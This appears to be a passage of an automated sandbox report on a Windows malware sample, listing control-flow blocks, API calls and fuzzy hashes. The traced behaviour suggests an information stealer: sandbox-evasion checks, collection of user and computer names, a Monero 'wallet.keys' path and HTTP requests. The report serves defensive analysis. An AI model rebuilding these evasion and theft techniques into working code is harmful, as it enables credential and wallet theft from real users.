                                         • a517d7-a517f1: call a5aad0 -> a517f4
                                         • a517f4-a517f8 -> a519c2, a517fe
                                         • a517fe-a51811 -> a51817, a5199e
                                         • a51817-a5181a -> a51821, a51835, a51849, a5185d, a5187f, a518ad, a518cf, a518f1, a51913, a51932, a51951, a51970, a5198f
                                         • a51821-a51830: call a5a820 -> a5199e
                                         • a51835-a51844: call a5a820 -> a5199e
                                         • a51849-a51858: call a5a820 -> a5199e
                                         • a5185d-a5186e: StrCmpCA -> a51870, a5187a
                                         • a51870-a51873 -> a5187a
                                         • a5187a -> a5199e
                                         • a5187f-a51890: StrCmpCA -> a51892, a5189e
                                         • a51892-a5189c -> a518a8
                                         • a5189e-a518a1 -> a518a8
                                         • a518a8 -> a5199e
                                         • a518ad-a518be: StrCmpCA -> a518c0, a518ca
                                         • a518c0-a518c3 -> a518ca
                                         • a518ca -> a5199e
                                         • a518cf-a518e0: StrCmpCA -> a518e2, a518ec
                                         • a518e2-a518e5 -> a518ec
                                         • a518ec -> a5199e
                                         • a518f1-a51902: StrCmpCA -> a51904, a5190e
                                         • a51904-a51907 -> a5190e
                                         • a5190e -> a5199e
                                         • a51913-a51924: StrCmpCA -> a51926, a51930
                                         • a51926-a51929 -> a51930
                                         • a51930 -> a5199e
                                         • a51932-a51943: StrCmpCA -> a51945, a5194f
                                         • a51945-a51948 -> a5194f
                                         • a5194f -> a5199e
                                         • a51951-a51962: StrCmpCA -> a51964, a5196e
                                         • a51964-a51967 -> a5196e
                                         • a5196e -> a5199e
                                         • a51970-a51981: StrCmpCA -> a51983, a5198d
                                         • a51983-a51986 -> a5198d
                                         • a5198d -> a5199e
                                         • a5198f-a51999: call a5a820 -> a5199e
                                         • a5199e-a519bd -> a517f4
                                         • a519c2-a519cd: call a5a800 (no successors)
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00A517C5
                                        • ExitProcess.KERNEL32 ref: 00A517D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: e11f905fb3dd1ad8101ce208488546b729867209f9272907dcd40c813a2380c1
                                        • Instruction ID: 15fc8ab9e77b5976dc187dc15236da0481aff20cb7b5e0ba36adf7167e75041a
                                        • Opcode Fuzzy Hash: e11f905fb3dd1ad8101ce208488546b729867209f9272907dcd40c813a2380c1
                                        • Instruction Fuzzy Hash: 4F517BB4B00209EFDB04DFA0D954BBE77B5BF44706F10854DE906AB280E770E989CB66

                                         Control-flow Graph

                                         Basic blocks of the function at 00A57500, recovered from the graph dump (start-end: API calls and subcalls made in the block -> successor blocks; the executed/not-executed colouring of the rendered graph is not recoverable from the text):
                                         • a57500-a5754a: GetWindowsDirectoryA -> a57553, a5754c
                                         • a5754c -> a57553
                                         • a57553-a575c7: GetVolumeInformationA, call a58d00 (x3) -> a575d8
                                         • a575d8-a575df -> a575e1, a575fc
                                         • a575e1-a575fa: call a58d00 -> a575d8
                                         • a575fc-a57617: GetProcessHeap, RtlAllocateHeap -> a57619, a57628
                                         • a57619-a57626: call a5a740 -> a5767e
                                         • a57628-a57658: wsprintfA, call a5a740 -> a5767e
                                         • a5767e-a5768e (no successors)
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A57542
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A5757F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A57603
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A5760A
                                        • wsprintfA.USER32 ref: 00A57640
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: 3af9c2b03f89766d39b5fa83b463085dd48d620c6ee48301799908c9ae857a21
                                        • Instruction ID: 65f473dea2befbe61296fad37aef70fc25a7f7964193914ba1fdd0167264f9a8
                                        • Opcode Fuzzy Hash: 3af9c2b03f89766d39b5fa83b463085dd48d620c6ee48301799908c9ae857a21
                                        • Instruction Fuzzy Hash: 614182B1D04248ABDB10DF94DD45BDEBBB8BF18705F100199F90977280E779AA48CBA5

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600CD8), ref: 00A598A1
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600E10), ref: 00A598BA
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600C60), ref: 00A598D2
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600ED0), ref: 00A598EA
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600E28), ref: 00A59903
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01608FF8), ref: 00A5991B
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,015F6A00), ref: 00A59933
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,015F6740), ref: 00A5994C
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600CF0), ref: 00A59964
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600E40), ref: 00A5997C
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600F00), ref: 00A59995
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600E70), ref: 00A599AD
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,015F6900), ref: 00A599C5
                                          • Part of subcall function 00A59860: GetProcAddress.KERNEL32(75900000,01600C78), ref: 00A599DE
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A411D0: ExitProcess.KERNEL32 ref: 00A41211
                                          • Part of subcall function 00A41160: GetSystemInfo.KERNEL32(?), ref: 00A4116A
                                          • Part of subcall function 00A41160: ExitProcess.KERNEL32 ref: 00A4117E
                                          • Part of subcall function 00A41110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A4112B
                                          • Part of subcall function 00A41110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00A41132
                                          • Part of subcall function 00A41110: ExitProcess.KERNEL32 ref: 00A41143
                                          • Part of subcall function 00A41220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A4123E
                                          • Part of subcall function 00A41220: __aulldiv.LIBCMT ref: 00A41258
                                          • Part of subcall function 00A41220: __aulldiv.LIBCMT ref: 00A41266
                                          • Part of subcall function 00A41220: ExitProcess.KERNEL32 ref: 00A41294
                                          • Part of subcall function 00A56770: GetUserDefaultLangID.KERNEL32 ref: 00A56774
                                          • Part of subcall function 00A41190: ExitProcess.KERNEL32 ref: 00A411C6
                                          • Part of subcall function 00A57850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A411B7), ref: 00A57880
                                          • Part of subcall function 00A57850: RtlAllocateHeap.NTDLL(00000000), ref: 00A57887
                                          • Part of subcall function 00A57850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A5789F
                                          • Part of subcall function 00A578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A57910
                                          • Part of subcall function 00A578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A57917
                                          • Part of subcall function 00A578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00A5792F
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01608FD8,?,00A6110C,?,00000000,?,00A61110,?,00000000,00A60AEF), ref: 00A56ACA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A56AE8
                                        • CloseHandle.KERNEL32(00000000), ref: 00A56AF9
                                        • Sleep.KERNEL32(00001770), ref: 00A56B04
                                        • CloseHandle.KERNEL32(?,00000000,?,01608FD8,?,00A6110C,?,00000000,?,00A61110,?,00000000,00A60AEF), ref: 00A56B1A
                                        • ExitProcess.KERNEL32 ref: 00A56B22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2525456742-0
                                        • Opcode ID: 2fe0e4cdc316706ab2c5ea89b1e7e8135bb7c0127b23c4e65212602f672ae207
                                        • Instruction ID: 832189fcc0d1f7533cf9cc64d28c22cfd85d4d55d53071fe457b924eb91e13b9
                                        • Opcode Fuzzy Hash: 2fe0e4cdc316706ab2c5ea89b1e7e8135bb7c0127b23c4e65212602f672ae207
                                        • Instruction Fuzzy Hash: 6C315471E00108ABDB04F7F0DE56BEE7778BF64342F404619FA02A2191EF706949C7A6

                                         Control-flow Graph
                                         • Block 1436 (a41220-a41247): call a589b0, GlobalMemoryStatusEx; successors 1439, 1440
                                         • Block 1439 (a41273-a4127a); successor 1441
                                         • Block 1440 (a41249-a41271): call a5da00 (x2); successor 1441
                                         • Block 1441 (a41281-a41285); successors 1443, 1444
                                         • Block 1443 (a41287); successors 1446, 1447
                                         • Block 1444 (a4129a-a4129d)
                                         • Block 1446 (a41292-a41294): ExitProcess
                                         • Block 1447 (a41289-a41290); successors 1444, 1446
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A4123E
                                        • __aulldiv.LIBCMT ref: 00A41258
                                        • __aulldiv.LIBCMT ref: 00A41266
                                        • ExitProcess.KERNEL32 ref: 00A41294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: ac62ec31f0e188dc92b3f4452dbcc9173fec23f2c1fbd0d22b233e0fec950591
                                        • Instruction ID: 29a2ed572a692285f08b021285168c22c196ddaf6e2c6c833bbe314032a86e87
                                        • Opcode Fuzzy Hash: ac62ec31f0e188dc92b3f4452dbcc9173fec23f2c1fbd0d22b233e0fec950591
                                        • Instruction Fuzzy Hash: 09016DB0E44308FAEB10DBE0CD49BDEBB78BB44702F208059E705F62C0E7B455858799

                                         Control-flow Graph
                                         • Block 1450 (a56af3); successor 1451
                                         • Block 1451 (a56b0a); successors 1453, 1454
                                         • Block 1453 (a56b0c-a56b22): call a56920, call a55b10, CloseHandle, ExitProcess
                                         • Block 1454 (a56aba-a56ad7): call a5aad0, OpenEventA; successors 1459, 1460
                                         • Block 1459 (a56af5-a56b04): CloseHandle, Sleep; successor 1451
                                         • Block 1460 (a56ad9-a56af1): call a5aad0, CreateEventA; successor 1453
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01608FD8,?,00A6110C,?,00000000,?,00A61110,?,00000000,00A60AEF), ref: 00A56ACA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A56AE8
                                        • CloseHandle.KERNEL32(00000000), ref: 00A56AF9
                                        • Sleep.KERNEL32(00001770), ref: 00A56B04
                                        • CloseHandle.KERNEL32(?,00000000,?,01608FD8,?,00A6110C,?,00000000,?,00A61110,?,00000000,00A60AEF), ref: 00A56B1A
                                        • ExitProcess.KERNEL32 ref: 00A56B22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: 554985fc36d15cdbe145afd68778f97ba1c2c2176cbcc0f3153d7810c84097fb
                                        • Instruction ID: 74c57f862819488063f084421d12ab4264b82c9a1f692180d6df049accac292c
                                        • Opcode Fuzzy Hash: 554985fc36d15cdbe145afd68778f97ba1c2c2176cbcc0f3153d7810c84097fb
                                        • Instruction Fuzzy Hash: E7F05E70A40209ABF700ABA0DD0ABBD7B74FB18742F908515BE03A21D1DBB05548D76A

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A44839
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00A44849
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: 1be8c7f9078f7b3c54b3264ccae1327592cb7cfe2c22ff9d4adb7bbc5c202e96
                                        • Instruction ID: 8257ce4853f2fca032ad3a74bbf5424482d96c0f822f504817ef0974e524bfb1
                                        • Opcode Fuzzy Hash: 1be8c7f9078f7b3c54b3264ccae1327592cb7cfe2c22ff9d4adb7bbc5c202e96
                                        • Instruction Fuzzy Hash: 6B213BB1D00209ABDF14DFA5ED49BDE7B75FB44320F108625FA25A7291EB706A09CB81

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                          • Part of subcall function 00A46280: InternetOpenA.WININET(00A60DFE,00000001,00000000,00000000,00000000), ref: 00A462E1
                                          • Part of subcall function 00A46280: StrCmpCA.SHLWAPI(?,0160E9B0), ref: 00A46303
                                          • Part of subcall function 00A46280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A46335
                                          • Part of subcall function 00A46280: HttpOpenRequestA.WININET(00000000,GET,?,0160E578,00000000,00000000,00400100,00000000), ref: 00A46385
                                          • Part of subcall function 00A46280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A463BF
                                          • Part of subcall function 00A46280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A463D1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A55228
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                        • String ID: ERROR$ERROR
                                        • API String ID: 3287882509-2579291623
                                        • Opcode ID: 4e0f5d05be1b8db5ab297f4c49bde610a4de99ea38dd73464e412e4ba7e6389a
                                        • Instruction ID: d7174ec218e133b21d52e74f6d9627701b4db5180fbb2c1177785aa5eface45f
                                        • Opcode Fuzzy Hash: 4e0f5d05be1b8db5ab297f4c49bde610a4de99ea38dd73464e412e4ba7e6389a
                                        • Instruction Fuzzy Hash: 4711F130A10148A7DB14FF74DE52AED7738BF60341F404654FD1A56592EF306B09C792
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A4112B
                                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00A41132
                                        • ExitProcess.KERNEL32 ref: 00A41143
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                        • String ID:
                                        • API String ID: 1103761159-0
                                        • Opcode ID: 9760f6c74278bc8282ebed2d863784914eead92a78bec51bf39876d4de2150ca
                                        • Instruction ID: 89aced8af5183069d17bb9f0506a8c0c77cfb0a51cc00265a51322436aa5aa70
                                        • Opcode Fuzzy Hash: 9760f6c74278bc8282ebed2d863784914eead92a78bec51bf39876d4de2150ca
                                        • Instruction Fuzzy Hash: 16E0E674A45308FBF710ABA49D0AB0D7678AB44B42F104155F709761D0D6B52640979E
                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00A410B3
                                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00A410F7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
